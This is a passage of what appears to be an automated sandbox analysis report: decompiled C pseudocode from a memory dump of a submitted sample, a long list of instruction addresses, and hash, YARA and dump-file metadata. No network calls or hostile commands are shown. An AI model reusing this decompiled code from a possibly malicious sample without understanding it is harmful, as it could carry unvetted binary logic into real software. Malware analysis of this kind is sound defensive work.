															_t396 = _t547 & 0xffffff00 |  *((char*)(_t579 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t101 = _t709 - 0x219c; // -6556
														_t549 = E00A07E6B(_t101, _t579 + 0x32c0);
														__eflags = _t549;
														if(_t549 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t709 - 0x21a0));
														if( *((char*)(_t709 - 0x21a0)) == 0) {
															L59:
															 *(_t709 - 0xd) = 0;
															goto L61;
														}
														_t103 = _t709 - 0x219c; // -6556
														_t551 = E00A07E4D(_t103, _t690);
														__eflags = _t551;
														if(_t551 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t700 - _t675;
													if(_t700 != _t675) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t401 + 0x6158));
												if( *((char*)(_t401 + 0x6158)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t690 + 0x10f8);
											if( *(_t690 + 0x10f8) == 0) {
												goto L50;
											}
											 *(_t709 - 0xd) = 1;
											__eflags =  *(_t579 + 0x3318);
											if( *(_t579 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t700 - _t390;
										_t391 = 1;
										if(_t700 != _t390) {
											goto L46;
										}
										goto L45;
									}
									_t678 =  *((intOrPtr*)(_t579 + 0x6cb4));
									 *(_t709 - 0xe) = _t678;
									 *(_t709 - 0x24) = _t678;
									__eflags = _t678;
									if(_t678 == 0) {
										goto L214;
									} else {
										_t674 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t690 + 0xec) -  *((intOrPtr*)(_t582 + 0xa334));
								if( *(_t690 + 0xec) <  *((intOrPtr*)(_t582 + 0xa334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t690 + 0xf1));
								if( *((char*)(_t690 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t579 + 0x32e0) = _t673;
								 *(_t579 + 0x32e4) = _t673;
								goto L26;
							}
							__eflags =  *(_t579 + 0x32e0) - _t673;
							if( *(_t579 + 0x32e0) >= _t673) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t579 + 0x32d8) = _t673;
							 *(_t579 + 0x32dc) = _t673;
							goto L22;
						}
						__eflags =  *(_t579 + 0x32d8) - _t673;
						if( *(_t579 + 0x32d8) >= _t673) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t697 - 3;
					if(_t697 != 3) {
						L10:
						__eflags = _t697 - 5;
						if(_t697 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t579 + 0x45ac));
						if( *((char*)(_t579 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t709 - 0x18));
						_push(0);
						_push(_t690 + 0x10);
						_push(_t579);
						_t568 = E00A186FD(_t673);
						__eflags = _t568;
						if(_t568 != 0) {
							__eflags = 0;
							 *0xa33260( *((intOrPtr*)(_t579 + 0x6ca0)),  *((intOrPtr*)(_t579 + 0x6ca4)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t579 + 0x10))))();
							goto L15;
						} else {
							E00A06FBA(0xa40f50, 1);
							goto L219;
						}
					}
					__eflags =  *(_t690 + 0x10f7);
					if( *(_t690 + 0x10f7) == 0) {
						goto L217;
					} else {
						E00A07C35(_t579, _t709,  *(_t690 + 8), _t579, _t690 + 0x10f8);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t690 + 0x5f)) == 0) {
					L4:
					_t396 = 0;
					goto L17;
				}
				_push(_t372);
				_push(0);
				_push(_t690 + 0x10);
				_push(_t579);
				if(E00A186FD(0) != 0) {
					_t673 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00A06FBA(0xa40f50, 1);
					goto L4;
				}
			}




















































































                                                        0x00a08709
                                                        0x00a0870e
                                                        0x00a08718
                                                        0x00a0871e
                                                        0x00a08721
                                                        0x00a08724
                                                        0x00a08726
                                                        0x00a0872c
                                                        0x00a08733
                                                        0x00a08739
                                                        0x00a08765
                                                        0x00a08766
                                                        0x00a0876c
                                                        0x00a0876f
                                                        0x00a08808
                                                        0x00a0880e
                                                        0x00a08814
                                                        0x00a0882c
                                                        0x00a0882c
                                                        0x00a08832
                                                        0x00a0884a
                                                        0x00a0884a
                                                        0x00a0884d
                                                        0x00a08853
                                                        0x00a08870
                                                        0x00a08875
                                                        0x00a08879
                                                        0x00a08883
                                                        0x00a0888e
                                                        0x00a08893
                                                        0x00a08895
                                                        0x00a08898
                                                        0x00a0889b
                                                        0x00a0889d
                                                        0x00a0889f
                                                        0x00a088a3
                                                        0x00a088a5
                                                        0x00a088a7
                                                        0x00a088a7
                                                        0x00a088a3
                                                        0x00a088af
                                                        0x00a088b4
                                                        0x00a088b5
                                                        0x00a088c2
                                                        0x00a088c3
                                                        0x00a088cb
                                                        0x00a088d2
                                                        0x00a088d5
                                                        0x00a0892c
                                                        0x00a08931
                                                        0x00a08933
                                                        0x00a08935
                                                        0x00a0893b
                                                        0x00a08941
                                                        0x00a08945
                                                        0x00a08945
                                                        0x00a08945
                                                        0x00a08945
                                                        0x00a088d7
                                                        0x00a088da
                                                        0x00a088e0
                                                        0x00a088e2
                                                        0x00a088e4
                                                        0x00a088e8
                                                        0x00a088ea
                                                        0x00a088f1
                                                        0x00a088f6
                                                        0x00a088f7
                                                        0x00a088fe
                                                        0x00a08903
                                                        0x00a0890d
                                                        0x00a0890f
                                                        0x00a08925
                                                        0x00a08911
                                                        0x00a08913
                                                        0x00a0891a
                                                        0x00a0891c
                                                        0x00a0891c
                                                        0x00a0890f
                                                        0x00a088e8
                                                        0x00a088e2
                                                        0x00a0894e
                                                        0x00a08953
                                                        0x00a0896b
                                                        0x00a08976
                                                        0x00a0897e
                                                        0x00a08981
                                                        0x00a08983
                                                        0x00a08987
                                                        0x00a0898a
                                                        0x00a0898d
                                                        0x00a08990
                                                        0x00a089a8
                                                        0x00a089ab
                                                        0x00a089b0
                                                        0x00a089b6
                                                        0x00a089b7
                                                        0x00a089b9
                                                        0x00a089c2
                                                        0x00a089c2
                                                        0x00a089c4
                                                        0x00a089c7
                                                        0x00a089d1
                                                        0x00a089d8
                                                        0x00a089dd
                                                        0x00a089df
                                                        0x00a093ae
                                                        0x00a093ae
                                                        0x00a087f5
                                                        0x00a087f6
                                                        0x00a087fb
                                                        0x00a08805
                                                        0x00a08805
                                                        0x00a089e5
                                                        0x00a089f3
                                                        0x00a089f6
                                                        0x00a089fe
                                                        0x00a08a05
                                                        0x00a08a08
                                                        0x00a08a1f
                                                        0x00a08a1f
                                                        0x00a08a22
                                                        0x00a08a22
                                                        0x00a08a27
                                                        0x00a08a2a
                                                        0x00a08a31
                                                        0x00a08a32
                                                        0x00a08a35
                                                        0x00a08a38
                                                        0x00a08a43
                                                        0x00a08a43
                                                        0x00a08a46
                                                        0x00a08a4d
                                                        0x00a08a4d
                                                        0x00a08a53
                                                        0x00a08a5a
                                                        0x00a08a5b
                                                        0x00a08a69
                                                        0x00a08a6e
                                                        0x00a08a70
                                                        0x00a08aa8
                                                        0x00a08aab
                                                        0x00a08ab7
                                                        0x00a08ab7
                                                        0x00a08ab7
                                                        0x00a08aba
                                                        0x00a08aba
                                                        0x00a08ac4
                                                        0x00a08ac9
                                                        0x00a08acb
                                                        0x00a08aef
                                                        0x00a08aef
                                                        0x00a08af6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08af8
                                                        0x00a08b02
                                                        0x00a08b07
                                                        0x00a08b09
                                                        0x00a08beb
                                                        0x00000000
                                                        0x00a08beb
                                                        0x00a08b0f
                                                        0x00a08b12
                                                        0x00a08b1a
                                                        0x00a08b20
                                                        0x00a08b21
                                                        0x00a08b21
                                                        0x00a08b23
                                                        0x00a08b2c
                                                        0x00a08b2f
                                                        0x00a08b3b
                                                        0x00a08b4e
                                                        0x00a08b58
                                                        0x00a08b6a
                                                        0x00a08b6f
                                                        0x00a08b76
                                                        0x00a08c0f
                                                        0x00a08c0f
                                                        0x00a08c13
                                                        0x00a08c19
                                                        0x00a08c1e
                                                        0x00a08c24
                                                        0x00a08c29
                                                        0x00a08c2f
                                                        0x00a08c36
                                                        0x00a08c3b
                                                        0x00a08c3c
                                                        0x00a08c3e
                                                        0x00a08cd1
                                                        0x00a08cd3
                                                        0x00a08cd8
                                                        0x00a08cda
                                                        0x00a08d2c
                                                        0x00a08d2f
                                                        0x00a08d31
                                                        0x00a08d55
                                                        0x00a08d58
                                                        0x00a08d58
                                                        0x00a08d5f
                                                        0x00a08d97
                                                        0x00a08d99
                                                        0x00a09363
                                                        0x00a09363
                                                        0x00a09367
                                                        0x00a0936d
                                                        0x00a09372
                                                        0x00a09376
                                                        0x00a09379
                                                        0x00a0937c
                                                        0x00a0937e
                                                        0x00a0937e
                                                        0x00a0937e
                                                        0x00a0937e
                                                        0x00a09384
                                                        0x00a09384
                                                        0x00a09388
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0938a
                                                        0x00a0938c
                                                        0x00a087f3
                                                        0x00a087f3
                                                        0x00000000
                                                        0x00a087f3
                                                        0x00a09392
                                                        0x00a09398
                                                        0x00a093a6
                                                        0x00a093a8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a093a8
                                                        0x00a0939a
                                                        0x00a0939c
                                                        0x00000000
                                                        0x00a0939c
                                                        0x00a08d9f
                                                        0x00a08d9f
                                                        0x00a08da2
                                                        0x00a08da9
                                                        0x00a08dbb
                                                        0x00a08dbb
                                                        0x00a08dbe
                                                        0x00a08dc0
                                                        0x00a08e07
                                                        0x00a08e07
                                                        0x00a08e0b
                                                        0x00a08e0d
                                                        0x00a08e15
                                                        0x00a08e15
                                                        0x00a08e29
                                                        0x00a08e2f
                                                        0x00a08e35
                                                        0x00a08e3b
                                                        0x00a08e4c
                                                        0x00a08e62
                                                        0x00a08e6d
                                                        0x00a08e76
                                                        0x00a08e79
                                                        0x00a08e80
                                                        0x00a08e86
                                                        0x00a08e8b
                                                        0x00a08e8e
                                                        0x00a08e90
                                                        0x00a08e93
                                                        0x00a08e96
                                                        0x00a08e99
                                                        0x00a08e9c
                                                        0x00a08e9f
                                                        0x00a08ea1
                                                        0x00a08f44
                                                        0x00a08f44
                                                        0x00a08f47
                                                        0x00a08f4e
                                                        0x00a08f55
                                                        0x00a08f59
                                                        0x00a08f6f
                                                        0x00a08f71
                                                        0x00a08f71
                                                        0x00a08f72
                                                        0x00a08f72
                                                        0x00a08f76
                                                        0x00a08f79
                                                        0x00a08f7c
                                                        0x00a08f7f
                                                        0x00a0908e
                                                        0x00a09095
                                                        0x00a09097
                                                        0x00a0909e
                                                        0x00a090c8
                                                        0x00a090cd
                                                        0x00a090df
                                                        0x00a090e5
                                                        0x00a090e7
                                                        0x00a090ed
                                                        0x00a09107
                                                        0x00a090a0
                                                        0x00a090a0
                                                        0x00a090a6
                                                        0x00a090ac
                                                        0x00a090ad
                                                        0x00a090ad
                                                        0x00a0909e
                                                        0x00a0910c
                                                        0x00a0910e
                                                        0x00a09113
                                                        0x00a0911a
                                                        0x00a0914c
                                                        0x00a0914c
                                                        0x00a0914c
                                                        0x00a0914e
                                                        0x00a09150
                                                        0x00a09150
                                                        0x00a09157
                                                        0x00a09161
                                                        0x00a09168
                                                        0x00a09187
                                                        0x00a09187
                                                        0x00a0918b
                                                        0x00a0918e
                                                        0x00a091ef
                                                        0x00a091ef
                                                        0x00a091f3
                                                        0x00a091f6
                                                        0x00a09209
                                                        0x00a09209
                                                        0x00a09209
                                                        0x00a0920b
                                                        0x00a0920b
                                                        0x00a0920f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09215
                                                        0x00a09218
                                                        0x00a0921c
                                                        0x00a09228
                                                        0x00a09228
                                                        0x00a0922c
                                                        0x00a09247
                                                        0x00a09247
                                                        0x00a09249
                                                        0x00a0925e
                                                        0x00a0925e
                                                        0x00a09260
                                                        0x00a09324
                                                        0x00a09324
                                                        0x00a09327
                                                        0x00a0932e
                                                        0x00a09336
                                                        0x00a0933d
                                                        0x00a09342
                                                        0x00a09344
                                                        0x00a0934d
                                                        0x00a09357
                                                        0x00a09357
                                                        0x00a09344
                                                        0x00a0935c
                                                        0x00000000
                                                        0x00a0935c
                                                        0x00a09266
                                                        0x00a0926b
                                                        0x00a0926d
                                                        0x00a09270
                                                        0x00a09276
                                                        0x00a09276
                                                        0x00a09278
                                                        0x00a0928a
                                                        0x00a0928a
                                                        0x00a09290
                                                        0x00a09295
                                                        0x00a09298
                                                        0x00a0929e
                                                        0x00a092b2
                                                        0x00a092b9
                                                        0x00a092cc
                                                        0x00a092ce
                                                        0x00a092d7
                                                        0x00a092dc
                                                        0x00a092e2
                                                        0x00a092f1
                                                        0x00a09304
                                                        0x00a09317
                                                        0x00a09319
                                                        0x00a0931c
                                                        0x00a09321
                                                        0x00000000
                                                        0x00a09321
                                                        0x00a0927a
                                                        0x00a09280
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09282
                                                        0x00a09288
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09288
                                                        0x00a09272
                                                        0x00a09274
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09274
                                                        0x00a0924b
                                                        0x00a0924e
                                                        0x00a09255
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0925b
                                                        0x00000000
                                                        0x00a0925b
                                                        0x00a0922e
                                                        0x00a09230
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09232
                                                        0x00a09239
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0923f
                                                        0x00a09241
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09241
                                                        0x00a0921e
                                                        0x00a09222
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09222
                                                        0x00a091f8
                                                        0x00a091ff
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09201
                                                        0x00a09203
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09205
                                                        0x00000000
                                                        0x00a09205
                                                        0x00a09190
                                                        0x00a09194
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09196
                                                        0x00a09198
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0919a
                                                        0x00a091a0
                                                        0x00a091ca
                                                        0x00a091ca
                                                        0x00a091d4
                                                        0x00a091d5
                                                        0x00a091d7
                                                        0x00a091d7
                                                        0x00a091e3
                                                        0x00a091e7
                                                        0x00a091ec
                                                        0x00000000
                                                        0x00a091ec
                                                        0x00a091a2
                                                        0x00a091a8
                                                        0x00a091b2
                                                        0x00a091b2
                                                        0x00a091b9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a091bb
                                                        0x00a091c5
                                                        0x00a091c6
                                                        0x00000000
                                                        0x00a091c6
                                                        0x00a091aa
                                                        0x00a091b0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a091b0
                                                        0x00a0916a
                                                        0x00a09170
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09172
                                                        0x00a0917c
                                                        0x00a0917c
                                                        0x00a0917e
                                                        0x00a09180
                                                        0x00a09180
                                                        0x00000000
                                                        0x00a0917e
                                                        0x00a09174
                                                        0x00a0917a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0917a
                                                        0x00a09159
                                                        0x00000000
                                                        0x00a09159
                                                        0x00a09131
                                                        0x00a0913d
                                                        0x00a09142
                                                        0x00a09144
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09146
                                                        0x00a09148
                                                        0x00000000
                                                        0x00a09148
                                                        0x00a08f85
                                                        0x00a08f8b
                                                        0x00a08f8e
                                                        0x00a08ff7
                                                        0x00a08ff7
                                                        0x00a08ffc
                                                        0x00a0900d
                                                        0x00a09012
                                                        0x00a09015
                                                        0x00a09017
                                                        0x00a09067
                                                        0x00a09067
                                                        0x00a0906a
                                                        0x00a0906a
                                                        0x00a09071
                                                        0x00a08fc3
                                                        0x00a08fc3
                                                        0x00a08fc5
                                                        0x00a09084
                                                        0x00a09084
                                                        0x00a09084
                                                        0x00a09086
                                                        0x00a09086
                                                        0x00000000
                                                        0x00a09086
                                                        0x00a08fcb
                                                        0x00a08fcb
                                                        0x00a08fcd
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08fd5
                                                        0x00000000
                                                        0x00a08fd5
                                                        0x00a09077
                                                        0x00a09079
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08fbf
                                                        0x00a08fbf
                                                        0x00000000
                                                        0x00a08fbf
                                                        0x00a09019
                                                        0x00a09021
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09023
                                                        0x00a09029
                                                        0x00a09035
                                                        0x00a09036
                                                        0x00a09039
                                                        0x00a0904a
                                                        0x00a0904b
                                                        0x00a09052
                                                        0x00a0903b
                                                        0x00a0903b
                                                        0x00a0903e
                                                        0x00a0903e
                                                        0x00a09057
                                                        0x00a09057
                                                        0x00a0905a
                                                        0x00a0905c
                                                        0x00a08fbc
                                                        0x00a08fbc
                                                        0x00000000
                                                        0x00a08fbc
                                                        0x00a09062
                                                        0x00000000
                                                        0x00a09062
                                                        0x00a08f90
                                                        0x00a08f93
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08f95
                                                        0x00a08f97
                                                        0x00a08fdb
                                                        0x00a08fdb
                                                        0x00a08fdd
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08fe9
                                                        0x00a08ff0
                                                        0x00000000
                                                        0x00a08ff0
                                                        0x00a08f99
                                                        0x00a08f9c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08f9e
                                                        0x00a08fa1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08fb0
                                                        0x00a08fb5
                                                        0x00a08fb7
                                                        0x00a08fb9
                                                        0x00000000
                                                        0x00a08fb9
                                                        0x00a08f5b
                                                        0x00a08f5d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08f61
                                                        0x00a08f62
                                                        0x00a08f66
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08f6a
                                                        0x00a08f6b
                                                        0x00000000
                                                        0x00a08f6b
                                                        0x00a08ea7
                                                        0x00a08ead
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08eb3
                                                        0x00a08eb9
                                                        0x00a08ebf
                                                        0x00a08ec1
                                                        0x00a08f41
                                                        0x00a08f41
                                                        0x00000000
                                                        0x00a08f41
                                                        0x00a08ec3
                                                        0x00a08ecd
                                                        0x00a08ecd
                                                        0x00a08edd
                                                        0x00a08ee0
                                                        0x00a08ee2
                                                        0x00a08f3c
                                                        0x00a08f3c
                                                        0x00a08f3f
                                                        0x00a08f3f
                                                        0x00000000
                                                        0x00a08f3f
                                                        0x00a08ee4
                                                        0x00a08eea
                                                        0x00a08eec
                                                        0x00a08eee
                                                        0x00a08f13
                                                        0x00a08f19
                                                        0x00a08f25
                                                        0x00a08f30
                                                        0x00a08f39
                                                        0x00000000
                                                        0x00a08f39
                                                        0x00a08ef0
                                                        0x00a08efa
                                                        0x00a08efc
                                                        0x00a08f01
                                                        0x00a08f07
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08f09
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08f0b
                                                        0x00a08f11
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08f11
                                                        0x00a08ef2
                                                        0x00a08ef8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08ef8
                                                        0x00a08ee6
                                                        0x00a08ee8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08ee8
                                                        0x00a08ec5
                                                        0x00a08ecb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08ecb
                                                        0x00a08e0f
                                                        0x00a08e0f
                                                        0x00a08e0f
                                                        0x00a08e0f
                                                        0x00000000
                                                        0x00a08e0f
                                                        0x00a08dc6
                                                        0x00a08dc9
                                                        0x00a08dca
                                                        0x00a08dcd
                                                        0x00a08dcf
                                                        0x00a08dda
                                                        0x00a08ddc
                                                        0x00a08deb
                                                        0x00a08dfd
                                                        0x00a08dfd
                                                        0x00a08ddc
                                                        0x00000000
                                                        0x00a08dcd
                                                        0x00a08dab
                                                        0x00a08db2
                                                        0x00a08db9
                                                        0x00a08e04
                                                        0x00000000
                                                        0x00a08e04
                                                        0x00000000
                                                        0x00a08db9
                                                        0x00a08d65
                                                        0x00a08d68
                                                        0x00a08d6f
                                                        0x00a08d76
                                                        0x00a08d7b
                                                        0x00a08d7d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08d7f
                                                        0x00a08d81
                                                        0x00a08d84
                                                        0x00a08d84
                                                        0x00a08d8a
                                                        0x00a08d8f
                                                        0x00000000
                                                        0x00a08d8f
                                                        0x00a08d33
                                                        0x00a08d3c
                                                        0x00a08d3d
                                                        0x00a08d42
                                                        0x00a08d45
                                                        0x00a08d47
                                                        0x00a08d4f
                                                        0x00a08d4f
                                                        0x00a08d51
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08d53
                                                        0x00a08cdc
                                                        0x00a08ce0
                                                        0x00a08ce6
                                                        0x00a08ce9
                                                        0x00a08ced
                                                        0x00a08cf5
                                                        0x00a08cf6
                                                        0x00a08cf9
                                                        0x00a08d01
                                                        0x00a08d02
                                                        0x00a08d05
                                                        0x00a08d07
                                                        0x00a08d0d
                                                        0x00a08d13
                                                        0x00a08d15
                                                        0x00a08d1b
                                                        0x00a08d25
                                                        0x00a08d25
                                                        0x00a08d13
                                                        0x00a08d05
                                                        0x00a08cf9
                                                        0x00a08ced
                                                        0x00000000
                                                        0x00a08ce0
                                                        0x00a08c44
                                                        0x00a08c47
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08c4d
                                                        0x00a08c50
                                                        0x00a08c53
                                                        0x00a08c55
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08c5b
                                                        0x00a08c5e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08c64
                                                        0x00a08c67
                                                        0x00a08c6e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08c76
                                                        0x00a08c80
                                                        0x00a08c85
                                                        0x00a08c87
                                                        0x00a08cbe
                                                        0x00a08cbe
                                                        0x00a08cc2
                                                        0x00a08d4c
                                                        0x00000000
                                                        0x00a08d4c
                                                        0x00a08cc8
                                                        0x00a08cca
                                                        0x00a08ccc
                                                        0x00000000
                                                        0x00a08ccc
                                                        0x00a08c89
                                                        0x00a08c8d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08c8f
                                                        0x00a08c97
                                                        0x00a08c98
                                                        0x00a08c9f
                                                        0x00a08cb9
                                                        0x00000000
                                                        0x00a08cb9
                                                        0x00a08b7c
                                                        0x00a08b83
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08b8b
                                                        0x00a08b96
                                                        0x00a08b9b
                                                        0x00a08b9e
                                                        0x00a08ba0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08ba2
                                                        0x00a08ba9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08bab
                                                        0x00a08bb2
                                                        0x00a08bbc
                                                        0x00a08bbd
                                                        0x00a08bf7
                                                        0x00a08bf9
                                                        0x00a08c05
                                                        0x00a08c0a
                                                        0x00a08c0c
                                                        0x00000000
                                                        0x00a08c0c
                                                        0x00a08bbf
                                                        0x00a08bc4
                                                        0x00a08bd2
                                                        0x00a08bd7
                                                        0x00a08bdb
                                                        0x00a08be1
                                                        0x00a08be1
                                                        0x00a08aef
                                                        0x00a08ad4
                                                        0x00a08adb
                                                        0x00a08ae0
                                                        0x00a08ae7
                                                        0x00000000
                                                        0x00a08ae7
                                                        0x00a08a79
                                                        0x00a08a7f
                                                        0x00a08a84
                                                        0x00a08a86
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08a88
                                                        0x00a08a8f
                                                        0x00a08aa1
                                                        0x00a08aa3
                                                        0x00000000
                                                        0x00a08aa3
                                                        0x00a08a92
                                                        0x00a08a98
                                                        0x00a08a9d
                                                        0x00a08a9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08a9f
                                                        0x00a08a48
                                                        0x00a08a4b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08a4b
                                                        0x00a08a3a
                                                        0x00a08a41
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08a41
                                                        0x00a08a0a
                                                        0x00a08a11
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08a13
                                                        0x00a08a17
                                                        0x00a08a1d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08a1d
                                                        0x00a089bb
                                                        0x00a089be
                                                        0x00a089c0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a089c0
                                                        0x00a08992
                                                        0x00a08998
                                                        0x00a0899b
                                                        0x00a0899e
                                                        0x00a089a0
                                                        0x00000000
                                                        0x00a089a6
                                                        0x00a089a6
                                                        0x00a089a6
                                                        0x00000000
                                                        0x00a089a6
                                                        0x00a089a0
                                                        0x00a0885b
                                                        0x00a08861
                                                        0x00000000
                                                        0x00000000
                                                        0x00a08863
                                                        0x00a0886a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0886a
                                                        0x00a08834
                                                        0x00a0883e
                                                        0x00a0883e
                                                        0x00a08844
                                                        0x00000000
                                                        0x00a08844
                                                        0x00a08836
                                                        0x00a0883c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0883c
                                                        0x00a08816
                                                        0x00a08820
                                                        0x00a08820
                                                        0x00a08826
                                                        0x00000000
                                                        0x00a08826
                                                        0x00a08818
                                                        0x00a0881e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0881e
                                                        0x00a08775
                                                        0x00a08778
                                                        0x00a08797
                                                        0x00a08797
                                                        0x00a0879a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a087a0
                                                        0x00a087a7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a087b2
                                                        0x00a087b3
                                                        0x00a087b7
                                                        0x00a087b8
                                                        0x00a087b9
                                                        0x00a087be
                                                        0x00a087c0
                                                        0x00a087d5
                                                        0x00a087e9
                                                        0x00a087f1
                                                        0x00000000
                                                        0x00a087c2
                                                        0x00a087c9
                                                        0x00000000
                                                        0x00a087c9
                                                        0x00a087c0
                                                        0x00a0877a
                                                        0x00a08781
                                                        0x00000000
                                                        0x00a08787
                                                        0x00a08792
                                                        0x00000000
                                                        0x00a08792
                                                        0x00a08781
                                                        0x00a0873e
                                                        0x00a0875c
                                                        0x00a0875c
                                                        0x00000000
                                                        0x00a0875c
                                                        0x00a08740
                                                        0x00a08741
                                                        0x00a08745
                                                        0x00a08746
                                                        0x00a0874e
                                                        0x00a08763
                                                        0x00a08763
                                                        0x00000000
                                                        0x00a08750
                                                        0x00a08757
                                                        0x00000000
                                                        0x00a08757

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog_memcmp
                                                        • String ID:
                                                        • API String ID: 3004599000-0
                                                        • Opcode ID: dab6d5b6cee1a3eebe943fc55b62ea158e0922805718f086f80f1563811e974c
                                                        • Instruction ID: 70d76039d07440908d3035b0654fb02194e5a10865b77b9db64e19c8b8e39140
                                                        • Opcode Fuzzy Hash: dab6d5b6cee1a3eebe943fc55b62ea158e0922805718f086f80f1563811e974c
                                                        • Instruction Fuzzy Hash: 4F82F93090424DAEDF25DF70D985BFAB7B9AF05300F0841BAE8999B1C3DB355A44CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1F303 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1F303() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00A1F310); // executed
				return _t1;
			}




                                                        0x00a1f308
                                                        0x00a1f30e

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F310,00A1ED75), ref: 00A1F308
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
